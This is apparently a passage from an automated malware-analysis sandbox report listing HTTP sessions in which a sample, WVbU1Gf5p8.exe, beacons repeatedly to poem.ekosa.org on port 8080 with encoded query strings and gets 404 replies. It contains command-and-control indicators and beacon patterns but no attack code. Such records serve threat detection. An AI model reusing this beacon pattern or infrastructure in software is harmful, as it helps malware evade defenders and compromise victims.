42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      118192.168.2.449896210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:06.080524921 CET5108OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:06.344393969 CET5108INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:06 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      119192.168.2.449897210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:06.617607117 CET5109OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:06.878498077 CET5110INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:06 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      12192.168.2.449774210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:03.585913897 CET260OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:03.857309103 CET266INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:03 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      120192.168.2.449898210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:07.283341885 CET5110OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:07.555593967 CET5111INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:07 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      121192.168.2.449899210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:07.835458040 CET5111OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:08.106828928 CET5112INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:07 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      122192.168.2.449900210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:08.374381065 CET5113OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:08.637886047 CET5113INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:08 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      123192.168.2.449901210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:09.027334929 CET5114OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:09.289967060 CET5115INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:08 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      124192.168.2.449902210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:09.563256979 CET5115OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:09.827905893 CET5116INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:09 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      125192.168.2.449903210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:10.096682072 CET5116OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:10.357073069 CET5117INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:09 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      126192.168.2.449904210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:10.740722895 CET5118OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:11.012825966 CET5118INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:10 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      127192.168.2.449905210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:11.280529976 CET5119OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:11.539246082 CET5120INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:10 GMT
      Connection: close
      Content-Length: 315
